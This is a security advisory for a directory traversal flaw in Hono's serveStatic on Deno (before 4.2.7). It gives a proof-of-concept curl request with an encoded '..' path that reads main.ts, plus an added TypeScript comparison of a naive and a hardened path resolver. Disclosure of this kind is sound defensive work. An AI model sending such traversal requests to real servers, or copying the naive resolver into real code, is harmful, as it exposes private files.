Description
Hono vulnerable to Restricted Directory Traversal in serveStatic with deno
Summary
When using serveStatic with deno, it is possible to traverse into the directory where main.ts is located.
My environment is configured as per this tutorial https://hono.dev/getting-started/deno
PoC
$ tree
.
├── deno.json
├── deno.lock
├── main.ts
├── README.md
└── static
    └── a.txt
source
import { Hono } from 'https://deno.land/x/hono@v4.2.6/mod.ts'
import { serveStatic } from 'https://deno.land/x/hono@v4.2.6/middleware.ts'
const app = new Hono()
app.use('/static/*', serveStatic({ root: './' }))
Deno.serve(app.fetch)
request
curl localhost:8000/static/%2e%2e/main.ts
The response is the content of main.ts.
Impact
Unexpected files are retrieved.
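The following added example (not part of the original advisory and not Hono's own code) contrasts a naive URL-to-file mapping, which reproduces the behaviour in the PoC, with a mapping that decodes the path first and then refuses any ".." segment. The function names naiveResolve, safeResolve and normalize are hypothetical, and the request paths are constructed samples.

```typescript
// Added example: hypothetical helpers, not Hono's implementation.

// Collapse "." and ".." segments the way a filesystem lookup would.
function normalize(p: string): string {
  const out: string[] = [];
  for (const seg of p.split("/")) {
    if (seg === "" || seg === ".") continue;
    if (seg === "..") out.pop();
    else out.push(seg);
  }
  return out.join("/");
}

// Naive mapping: decode the URL path and join it to the root as-is.
// "%2e%2e" becomes ".." only after the router has already matched
// "/static/*", so the lookup leaves the static/ directory.
function naiveResolve(root: string, urlPath: string): string {
  return normalize(root + "/" + decodeURIComponent(urlPath));
}

// Hardened mapping: decode once, then reject anything that could step
// out of the mounted directory before touching the filesystem.
function safeResolve(root: string, urlPath: string): string | null {
  let decoded: string;
  try {
    decoded = decodeURIComponent(urlPath);
  } catch {
    return null; // malformed percent-encoding
  }
  // NUL bytes and backslashes (a path separator on Windows) are refused.
  if (decoded.indexOf("\0") !== -1 || decoded.indexOf("\\") !== -1) return null;
  // Any dot-dot segment is refused, whether it arrived encoded or not.
  if (decoded.split("/").some((seg) => seg === "..")) return null;
  return normalize(root + "/" + decoded);
}
```

A caller would answer 404 when safeResolve returns null and only then open the returned path relative to the working directory.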
Packages
Name: hono (npm)
Affected versions: < 4.2.7
Fixed version: 4.2.7
Related vulnerabilities
CVSS3: 5.3
nvd
almost 2 years ago
Hono is a Web application framework that provides support for any JavaScript runtime. Prior to version 4.2.7, when using serveStatic with deno, it is possible to traverse the directory where `main.ts` is located. This can result in retrieval of unexpected files. Version 4.2.7 contains a patch for the issue.